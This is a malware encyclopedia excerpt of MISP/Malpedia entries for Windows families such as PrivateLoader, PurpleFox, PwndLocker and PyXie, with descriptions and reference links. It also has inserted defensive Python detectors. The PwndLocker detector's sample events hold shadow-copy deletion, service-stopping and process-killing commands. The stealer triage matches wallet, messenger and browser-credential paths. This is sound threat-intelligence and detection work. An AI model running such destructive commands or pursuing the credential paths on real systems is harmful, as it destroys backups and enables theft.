PrivateLoader

According to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.

The tag is: misp-galaxy:malpedia="PrivateLoader"

PrivateLoader is also known as:

Table 4319. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader

https://www.youtube.com/watch?v=Ldp7eESQotM

https://www.bitsight.com/blog/zero-50k-infections-pseudomanuscrypt-sinkholing-part-1

https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service

https://www.bitsight.com/blog/unpacking-colibri-loader-russian-apt-linked-campaign

https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/

https://tavares.re/blog/2022/06/06/hunting-privateloader-pay-per-install-service/

https://embee-research.ghost.io/identifying-privateloader-servers-with-censys/

https://www.bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey

https://www.trendmicro.com/en_us/research/22/e/netdooka-framework-distributed-via-privateloader-ppi.html

https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem

https://intel471.com/blog/privateloader-malware

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://any.run/cybersecurity-blog/privateloader-analyzing-the-encryption-and-decryption-of-a-modern-loader/

https://medium.com/walmartglobaltech/icedid-leverages-privateloader-7744771bf87f

https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey

https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e

https://www.zscaler.com/blogs/security-research/peeking-privateloader

https://de.darktrace.com/blog/privateloader-network-based-indicators-of-compromise

Project Hook POS

The tag is: misp-galaxy:malpedia="Project Hook POS"

Project Hook POS is also known as:

Table 4321. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.project_hook

https://threatpost.com/dexter-project-hook-pos-malware-campaigns-persist/104655/

Prometei (Windows)

According to Lior Rochberger, Cybereason, Prometei is a modular, multi-stage cryptocurrency-mining botnet. It was discovered in July 2020, and the Cybereason Nocturnus team found evidence that Prometei has been evolving since 2016. There are Linux and Windows versions of this malware.

The tag is: misp-galaxy:malpedia="Prometei (Windows)"

Prometei (Windows) is also known as:

Table 4322. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.prometei

https://twitter.com/honeymoon_ioc/status/1494016518694309896

https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html

https://blog.talosintelligence.com/prometei-botnet-improves/

https://twitter.com/honeymoon_ioc/status/1494311182550904840

https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities

proteus

The tag is: misp-galaxy:malpedia="proteus"

proteus is also known as:

Table 4324. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.proteus

https://www.fortinet.com/blog/threat-research/a-new-all-in-one-botnet-proteus.html

Proto8RAT

The tag is: misp-galaxy:malpedia="Proto8RAT"

Proto8RAT is also known as:

Table 4325. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.proto8_rat

https://github.com/avast/ioc/tree/master/OperationDragonCastling

PseudoManuscrypt

According to PCrisk, PseudoManuscrypt is the name of malware that spies on victims. It is similar to another malware called Manuscrypt. We discovered PseudoManuscrypt while checking installers for pirated software (one example is a fake pirated installer for SolarWinds, a network monitoring software).

The tag is: misp-galaxy:malpedia="PseudoManuscrypt"

PseudoManuscrypt is also known as:

Table 4328. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pseudo_manuscrypt

https://www.youtube.com/watch?v=uakw2HMGZ-I

https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/

https://asec.ahnlab.com/en/31683/

https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1

https://www.bitsight.com/blog/zero-50k-infections-pseudomanuscrypt-sinkholing-part-1

https://ics-cert.kaspersky.com/reports/2021/12/16/pseudomanuscrypt-a-mass-scale-spyware-attack-campaign/

PsiX

According to Matthew Mesa, this is a modular bot. The name stems from the string PsiXMainModule found in binaries until mid-September 2018.

In binaries, apart from BotModule and MainModule, references to the following modules have been observed:

  • BrowserModule

  • BTCModule

  • ComplexModule

  • KeyLoggerModule

  • OutlookModule

  • ProcessModule

  • RansomwareModule

  • SkypeModule

The tag is: misp-galaxy:malpedia="PsiX"

PsiX is also known as:

  • PsiXBot

Table 4329. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.psix

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://www.proofpoint.com/us/threat-insight/post/psixbot-continues-evolve-updated-dns-infrastructure

https://www.proofpoint.com/us/threat-insight/post/psixbot-now-using-google-dns-over-https-and-possible-new-sexploitation-module

https://blog.comodo.com/comodo-news/versions-of-psixbot/

https://blog.fox-it.com/2019/03/27/psixbot-the-evolution-of-a-modular-net-bot/

https://twitter.com/seckle_ch/status/1169558035649433600

https://twitter.com/mesa_matt/status/1035211747957923840

PC Surveillance System

Citizenlab notes that PC Surveillance System (PSS) is a commercial spyware product offered by Cyberbit and marketed to intelligence and law enforcement agencies.

The tag is: misp-galaxy:malpedia="PC Surveillance System"

PC Surveillance System is also known as:

  • PSS

Table 4331. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pss

https://citizenlab.ca/2017/12/champing-cyberbit-ethiopian-dissidents-targeted-commercial-spyware/

Pteranodon

The tag is: misp-galaxy:malpedia="Pteranodon"

Pteranodon is also known as:

  • Pterodo

Table 4332. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon

https://blogs.cisco.com/security/network-footprints-of-gamaredon-group

https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021

https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/Gamaredon_activity.pdf

https://blog.threatstop.com/russian-apt-gamaredon-group

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-intense-campaign-ukraine

https://labs.sentinelone.com/pro-russian-cyberspy-gamaredon-intensifies-ukrainian-security-targeting/

https://www.threatstop.com/blog/gamaredon-group-understanding-the-russian-apt

https://cert.gov.ua/news/42

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine

https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution

https://www.bleepingcomputer.com/news/security/russian-gamaredon-hackers-use-8-new-malware-payloads-in-attacks/

https://blog.yoroi.company/research/cyberwarfare-a-deep-dive-into-the-latest-gamaredon-espionage-campaign/

https://www.vkremez.com/2019/01/lets-learn-deeper-dive-into-gamaredon.html

https://www.elastic.co/blog/playing-defense-against-gamaredon-group

https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf

https://blogs.blackberry.com/en/2022/11/gamaredon-leverages-microsoft-office-docs-to-target-ukraine-government

https://cert.gov.ua/article/10702

https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/

https://cert.gov.ua/news/46

https://cert.gov.ua/article/2807

https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations

https://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/

https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/

https://attack.mitre.org/groups/G0047

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military

https://threatmon.io/cybergun-technical-analysis-of-the-armageddons-infostealer/

https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/

https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/

https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game

Punkey POS

The tag is: misp-galaxy:malpedia="Punkey POS"

Punkey POS is also known as:

  • poscardstealer

  • pospunk

  • punkeypos

Table 4334. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.punkey_pos

https://www.pandasecurity.com/mediacenter/malware/punkeypos/

https://www.trustwave.com/Resources/SpiderLabs-Blog/New-POS-Malware-Emerges---Punkey/

pupy (Windows)

Pupy is an open-source, cross-platform RAT and post-exploitation framework mainly written in Python. Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure Python, PowerShell and APK. Most of the loaders bundle an embedded Python runtime, Python library modules in source, compiled or native form, and a flexible configuration. They bootstrap a Python runtime environment, mostly in memory, for the later stages of Pupy to run in. Pupy can communicate using various transports, migrate into processes, and load remote Python code, Python packages and Python C extensions from memory.

The tag is: misp-galaxy:malpedia="pupy (Windows)"

pupy (Windows) is also known as:

  • Patpoopy

Table 4335. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy

https://github.com/n1nj4sec/pupy

https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html

https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage

https://documents.trendmicro.com/assets/txt/earth-berberoka-linux-iocs-2.txt

https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage

https://www.infinitumit.com.tr/apt-35/

https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf

https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/

https://securityaffairs.co/wordpress/56348/intelligence/magic-hound-campaign.html

https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/

https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/

https://labs.k7computing.com/index.php/pupy-rat-hiding-under-werfaults-cover/

https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf

https://go.recordedfuture.com/hubfs/reports/cta-2022-0330.pdf

PureCrypter

According to Zscaler, PureCrypter is a fully featured loader that has been sold since at least March 2021. The malware has been observed distributing a variety of remote access trojans and information stealers. The loader is a .NET executable obfuscated with SmartAssembly that uses compression, encryption and obfuscation to evade antivirus products. PureCrypter's persistence, injection and defense-evasion features are configurable through a Google Protocol Buffer message.

The tag is: misp-galaxy:malpedia="PureCrypter"

PureCrypter is also known as:

Table 4336. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter

https://www.prodaft.com/m/reports/RIG_TLP_CLEAR-1.pdf

https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter

https://blog.netlab.360.com/purecrypter-is-busy-pumping-out-various-malicious-malware-families/

PurpleFox

Purple Fox uses the msi.dll function MsiInstallProductA to download and execute its payload. The payload is an .msi file that contains encrypted shellcode in both 32-bit and 64-bit versions. Once executed, the system is restarted and the PendingFileRenameOperations registry value is used to rename the malware's components during boot.

Upon restart the rootkit capability of Purple Fox is invoked: it creates a suspended svchost process and injects a DLL that installs a driver providing the rootkit functionality.

The latest version of Purple Fox abuses open-source code to enable its rootkit components, which hide and protect its files and registry entries. It also abuses a file-utility program to hide its DLL component, which hinders reverse engineering.
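The boot-time rename step above leaves a trace that can be inspected before the reboot happens. The following is an added example, not code from the MISP galaxy or from any Purple Fox report: it parses the PendingFileRenameOperations value (REG_MULTI_SZ, read on Windows as a list of strings) and flags renames that move a file from a staging location into a system directory or over a driver. The file names in the sample value are constructed placeholders, not real indicators.

```python
r"""Parse PendingFileRenameOperations and flag boot-time renames into system paths.

Added example; not code from the MISP galaxy or any Purple Fox report.
On a live host the value is REG_MULTI_SZ under
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager and
winreg.QueryValueEx returns it as a list of str. The list below is a
constructed sample (placeholder file names, not real indicators).
"""
from dataclasses import dataclass
from typing import List, Optional

SAMPLE_VALUE = [
    r"\??\C:\Windows\Temp\tmp1A2B.tmp",                    # source
    r"!\??\C:\Windows\System32\drivers\example_drv.sys",   # destination; '!' = overwrite
    r"\??\C:\Users\alice\AppData\Local\Temp\setup.msi",
    "",                                                    # empty destination = delete at boot
    r"\??\C:\Program Files\Vendor\update.exe",
    r"\??\C:\Program Files\Vendor\app.exe",
]

NT_PREFIX = "\\??\\"
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
STAGING_MARKERS = ("\\temp\\", "\\appdata\\local\\temp\\", "\\programdata\\")


@dataclass
class PendingRename:
    source: str
    target: Optional[str]   # None: the source is deleted at boot
    overwrite: bool         # destination carried the '!' prefix (MOVEFILE_REPLACE_EXISTING)


def _strip_nt_prefix(path: str) -> str:
    return path[len(NT_PREFIX):] if path.startswith(NT_PREFIX) else path


def parse_pfro(entries: List[str]) -> List[PendingRename]:
    """Entries come in (source, destination) pairs."""
    if len(entries) % 2:
        raise ValueError("PendingFileRenameOperations must hold an even number of strings")
    ops = []
    for src, dst in zip(entries[0::2], entries[1::2]):
        overwrite = dst.startswith("!")
        if overwrite:
            dst = dst[1:]
        ops.append(PendingRename(_strip_nt_prefix(src), _strip_nt_prefix(dst) or None, overwrite))
    return ops


def is_suspicious(op: PendingRename) -> bool:
    """Heuristic, not a signature: a file staged in a temp location that is
    renamed into a system directory (or that replaces a driver) matches the
    component-renaming step described above. Installers and AV engines mostly
    queue deletions, or renames inside their own tree."""
    if op.target is None:
        return False
    src, dst = op.source.lower(), op.target.lower()
    into_system = dst.startswith(SYSTEM_DIRS)
    from_staging = any(marker in src for marker in STAGING_MARKERS)
    return into_system and (from_staging or dst.endswith(".sys"))


def suspicious_ops(entries: List[str]) -> List[PendingRename]:
    return [op for op in parse_pfro(entries) if is_suspicious(op)]


if __name__ == "__main__":
    # On Windows, replace SAMPLE_VALUE with the live value:
    #   winreg.QueryValueEx(winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
    #       r"SYSTEM\CurrentControlSet\Control\Session Manager"),
    #       "PendingFileRenameOperations")[0]
    for op in suspicious_ops(SAMPLE_VALUE):
        print(f"suspicious boot-time rename: {op.source} -> {op.target} (overwrite={op.overwrite})")
```

The value is also worth collecting in a triage package: an entry that renames a temp file over a .sys path survives the reboot only in the file system, so the registry snapshot taken before the reboot is often the only record of where the component came from.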

The tag is: misp-galaxy:malpedia="PurpleFox"

PurpleFox is also known as:

Table 4339. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.purplefox

https://blog.malwarebytes.com/trojans/2021/03/perkiler-malware-turns-to-smb-brute-force-to-spread/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal/IOCs-Purple-Fox.txt

https://blog.minerva-labs.com/malicious-telegram-installer-drops-purple-fox-rootkit

https://www.guardicore.com/labs/purple-fox-rootkit-now-propagates-as-a-worm/

https://www.trendmicro.com/en_us/research/21/l/a-look-into-purple-fox-server-infrastructure.html

https://labs.sentinelone.com/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow/

https://threatresearch.ext.hp.com/purple-fox-exploit-kit-now-exploits-cve-2021-26411/

https://www.proofpoint.com/us/blog/threat-insight/chinese-malware-appears-earnest-across-cybercrime-threat-landscape

https://www.thecybersecuritytimes.com/purple-fox-malware-is-actively-distributed-via-telegram-installers/

https://blogs.blackberry.com/en/2022/01/threat-thursday-purple-fox-rootkit

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal/Technical%20Brief%20-%20A%20Look%20Into%20Purple%20Fox%E2%80%99s%20New%20Arrival%20Vector.pdf

https://www.trendmicro.com/en_in/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html

https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/

https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html

https://nao-sec.org/2021/04/exploit-kit-still-sharpens-a-sword.html

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/security-101-the-impact-of-cryptocurrency-mining-malware

https://www.trendmicro.com/en_us/research/21/g/purplefox-using-wpad-to-targent-indonesian-users.html

https://twitter.com/C0rk1_H/status/1412801973628272641?s=20

https://s.tencent.com/research/report/1322.html

https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html

https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html

PurpleWave

Zscaler reported on a new infostealer called PurpleWave, which is written in C++ and silently installs itself on a user's system. It connects to a command-and-control (C&C) server to send system information and installs additional malware on the infected system.

The author of this malware is advertising and selling PurpleWave stealer on Russian cybercrime forums for 5,000 RUB (US$68) with lifetime updates and 4,000 RUB (US$54) with only two updates.

The tag is: misp-galaxy:malpedia="PurpleWave"

PurpleWave is also known as:

Table 4340. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.purplewave

https://www.zscaler.com/blogs/research/purplewave-new-infostealer-russia

Pushdo

Pushdo is usually classified as a "downloader" trojan, meaning that its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families, and Pushdo is more sophisticated than most, but that sophistication lies in the Pushdo control server rather than in the trojan itself.

The tag is: misp-galaxy:malpedia="Pushdo"

Pushdo is also known as:

Table 4341. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo

https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf

https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/

https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/

http://malware-traffic-analysis.net/2017/04/03/index2.html

https://www.secureworks.com/research/pushdo

https://www.secureworks.com/research/threat-profiles/gold-essex

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

http://www.secureworks.com/research/threat-profiles/gold-essex

Putabmow

The tag is: misp-galaxy:malpedia="Putabmow"

Putabmow is also known as:

Table 4342. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.putabmow

puzzlemaker

The dropper module is used to install two executables that pretend to be legitimate files belonging to Microsoft Windows OS. One of these files (%SYSTEM%\WmiPrvMon.exe) is registered as a service and is used as a launcher for the second executable. This second executable (%SYSTEM%\wmimon.dll) has the functionality of a remote shell and can be considered the main payload of the attack.

The tag is: misp-galaxy:malpedia="puzzlemaker"

puzzlemaker is also known as:

Table 4343. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.puzzlemaker

https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/

PwndLocker

PwndLocker is a ransomware that was observed in late 2019 and is reported to have been used to target businesses and local governments/cities. According to one source, ransom amounts demanded as part of PwndLocker activity range from $175k USD to $650k USD depending on the size of the network. PwndLocker attempts to disable a variety of Windows services so that the files they hold open can be encrypted. Various processes are also terminated, such as web browsers and software related to security, backups and databases. Shadow copies are deleted by the ransomware, and encryption of files begins once the system has been prepared in this way. Executable files and files likely to be needed for the system to keep functioning appear to be skipped, and a large number of folders, mostly related to Microsoft Windows system files, are also ignored. As of March 2020, encrypted files have been observed with the added extensions .key and .pwnd. Ransom notes are dropped in folders where encrypted files are found and also on the user's desktop.
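The preparation sequence described above (services stopped, processes killed, shadow copies removed, all shortly before encryption) is a better detection anchor than the encryption itself, because it precedes the damage. The following is an added example, not code from the MISP galaxy or from any PwndLocker/ProLock report: it correlates process-creation events per host and alerts when three distinct staging behaviours occur inside a short window. The event format and the specific command lines (net stop, taskkill, vssadmin) are assumptions of this example; the page only says which effects the ransomware achieves, not which commands it runs.

```python
"""Correlate pre-encryption staging behaviour from process-creation events.

Added example; not from the MISP galaxy or any PwndLocker/ProLock report.
The event tuple layout and the command lines below are assumptions:
the page says services are stopped, browser/security/backup/database
processes are killed and shadow copies are cleared, but names no commands.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

# Constructed sample: (ISO timestamp, host, command line). srv01 shows the
# full staging sequence within 35 seconds; ws07 shows isolated admin activity.
SAMPLE_EVENTS: List[Tuple[str, str, str]] = [
    ("2020-03-01T02:10:05", "srv01", "net stop SQLWriter /y"),
    ("2020-03-01T02:10:07", "srv01", "net stop VeeamBackupSvc /y"),
    ("2020-03-01T02:10:12", "srv01", "taskkill /f /im chrome.exe"),
    ("2020-03-01T02:10:13", "srv01", "taskkill /f /im sqlservr.exe"),
    ("2020-03-01T02:10:40", "srv01", "vssadmin delete shadows /all /quiet"),
    ("2020-03-01T09:30:00", "ws07",  "taskkill /f /im outlook.exe"),
    ("2020-03-01T11:00:00", "ws07",  "net stop spooler"),
]

# Each stage maps to substrings of the command line that implement it
# (assumed tooling; extend with your own telemetry's vocabulary).
STAGES: Dict[str, Tuple[str, ...]] = {
    "stop_services":  ("net stop", "sc stop", "stop-service"),
    "kill_processes": ("taskkill", "stop-process"),
    "delete_shadows": ("vssadmin delete shadows", "wmic shadowcopy delete", "win32_shadowcopy"),
}


def stage_of(cmdline: str) -> Optional[str]:
    """Classify one command line into a staging stage, or None if it is not one."""
    low = cmdline.lower()
    for stage, needles in STAGES.items():
        if any(needle in low for needle in needles):
            return stage
    return None


def detect_staging(events: List[Tuple[str, str, str]],
                   window: timedelta = timedelta(minutes=15),
                   min_stages: int = 3) -> Dict[str, List[str]]:
    """Return {host: sorted stages} for hosts where at least min_stages
    distinct stages occur within `window` of each other. A single taskkill
    is routine; all three stages within minutes is the sequence above."""
    per_host: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for ts, host, cmd in events:
        stage = stage_of(cmd)
        if stage:
            per_host[host].append((datetime.fromisoformat(ts), stage))

    alerts: Dict[str, List[str]] = {}
    for host, seq in per_host.items():
        seq.sort()
        for i, (t0, _) in enumerate(seq):
            # Sliding window anchored at each staging event.
            stages = {s for t, s in seq[i:] if t - t0 <= window}
            if len(stages) >= min_stages:
                alerts[host] = sorted(stages)
                break
    return alerts


if __name__ == "__main__":
    for host, stages in detect_staging(SAMPLE_EVENTS).items():
        print(f"{host}: pre-encryption staging detected ({', '.join(stages)})")
```

The window and threshold are the tuning knobs: a backup server legitimately stops services and deletes old shadow copies during maintenance, so the alert should fire on the combination and timing rather than on any one command.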

The tag is: misp-galaxy:malpedia="PwndLocker"

PwndLocker is also known as:

  • ProLock

Table 4345. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pwndlocker

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.group-ib.com/blog/prolock

https://www.it-klinika.rs/blog/paznja-novi-opasni-ransomware-pwndlocker-i-u-srbiji

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.zdnet.com/article/fbi-prolock-ransomware-gains-access-to-victim-networks-via-qakbot-infections/

https://www.bleepingcomputer.com/news/security/pwndlocker-ransomware-gets-pwned-decryption-now-available/

https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf

https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/

https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/

https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/

https://www.cert-pa.it/notizie/pwndlocker-si-rinnova-in-prolock-ransomware/

https://www.group-ib.com/blog/prolock_evolution

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://www.bleepingcomputer.com/news/security/new-pwndlocker-ransomware-targeting-us-cities-enterprises/

https://id-ransomware.blogspot.com/2019/10/pwndlocker-ransomware.html

https://soolidsnake.github.io/2020/05/11/Prolock_ransomware.html

https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://news.sophos.com/en-us/2020/07/27/prolock-ransomware-gives-you-the-first-8-kilobytes-of-decryption-for-free/

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/

https://medium.com/s2wlab/operation-synctrek-e5013df8d167

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.intrinsec.com/egregor-prolock/

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

PXRECVOWEIWOEI

Information stealer; based on its strings it appears to target cryptocurrencies, instant messengers and browser data.
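The assessment above is the typical first-pass triage of an unknown stealer: pull the printable strings and see which data sources they reference. The following is an added example, not code from the MISP galaxy or from the cited tweet: it extracts printable strings from a byte blob the way `strings -n` does and groups them into the three categories named above, reporting a category only when two or more distinct strings support it. The keyword vocabulary is an assumption of this example (a real triage would use a fuller one, or a rule engine such as capa or YARA), and the sample bytes are constructed, not taken from the real family.

```python
r"""Rough capability triage from a binary's printable strings.

Added example; not code from the MISP galaxy or the cited tweet. The
keyword vocabulary is an assumption and SAMPLE_BLOB is a constructed
stand-in for a sample's bytes, not data from the real family.
"""
import re
from collections import defaultdict
from typing import Dict, List

# Constructed: roughly what a stealer's .data section might contain.
SAMPLE_BLOB = (
    b"\x00\x00kernel32.dll\x00GetProcAddress\x00"
    b"\\Exodus\\exodus.wallet\x00wallet.dat\x00"
    b"\\Telegram Desktop\\tdata\x00Discord\\Local Storage\\leveldb\x00"
    b"\\Google\\Chrome\\User Data\\Default\\Login Data\x00"
    b"\\Mozilla\\Firefox\\Profiles\x00logins.json\x00"
    b"User-Agent: Mozilla/5.0\x00\x01\x02\x03short\x00"
)

# Regexes applied to lower-cased strings. A category is reported only when
# MIN_DISTINCT_HITS different strings match it, so one generic word
# (e.g. "signal" in an API name) does not produce a finding on its own.
CATEGORIES: Dict[str, List[str]] = {
    "cryptocurrency": [r"wallet\.dat", r"exodus", r"electrum", r"\.wallet\b", r"metamask"],
    "messenger":      [r"telegram desktop", r"\\tdata\b", r"discord", r"\\signal\\"],
    "browser":        [r"login data", r"logins\.json", r"\\cookies\b", r"\\user data\\", r"\\profiles\b"],
}
MIN_DISTINCT_HITS = 2


def extract_strings(blob: bytes, min_len: int = 6) -> List[str]:
    """Printable-ASCII runs of at least min_len bytes, like `strings -n`."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def classify(strings: List[str]) -> Dict[str, List[str]]:
    """Map category -> sorted list of the strings that support it."""
    hits: Dict[str, set] = defaultdict(set)
    for s in strings:
        low = s.lower()
        for category, patterns in CATEGORIES.items():
            if any(re.search(p, low) for p in patterns):
                hits[category].add(s)
    return {c: sorted(v) for c, v in hits.items() if len(v) >= MIN_DISTINCT_HITS}


def triage(blob: bytes) -> Dict[str, List[str]]:
    return classify(extract_strings(blob))


if __name__ == "__main__":
    # For a real file: triage(open(path, "rb").read()); packed samples need
    # unpacking first, since their strings are not visible on disk.
    for category, evidence in triage(SAMPLE_BLOB).items():
        print(f"{category}: {evidence}")
```

String evidence is weak on its own: packed or string-encrypted samples show nothing until unpacked, and a library that bundles browser paths will light up the browser category without stealing anything. Treat the output as a prompt for dynamic analysis, which is how the source phrases it ("based on strings it seems to target...").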

The tag is: misp-galaxy:malpedia="PXRECVOWEIWOEI"

PXRECVOWEIWOEI is also known as:

Table 4347. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pxrecvoweiwoei

https://twitter.com/suyog41/status/1688797716447432704

win.pyfiledel

Py2exe-built worm that propagates via USB drives and embeds a wiper routine, triggered when the current date is later than 2016-04-03 and the file C:\txt.txt exists.

The tag is: misp-galaxy:malpedia="win.pyfiledel"

win.pyfiledel is also known as:

Table 4348. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pyfiledel

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/worm.win32.pyfiledel.aa

https://biebermalware.wordpress.com/2018/02/14/reversing-py2exe-binaries/

PyXie

Full-featured Python RAT compiled into an executable.

PyXie RAT functionality includes:

  • Man-in-the-middle (MITM) interception

  • Web injects

  • Keylogging

  • Credential harvesting

  • Network scanning

  • Cookie theft

  • Clearing logs

  • Recording video

  • Running arbitrary payloads

  • Monitoring USB drives and exfiltrating data

  • WebDAV server

  • SOCKS5 proxy

  • Virtual Network Computing (VNC)

  • Certificate theft

  • Inventorying software

  • Enumerating the domain with SharpHound

The tag is: misp-galaxy:malpedia="PyXie"

PyXie is also known as:

  • PyXie RAT

Table 4351. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pyxie

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/

https://www.secureworks.com/research/threat-profiles/gold-dupont

https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3

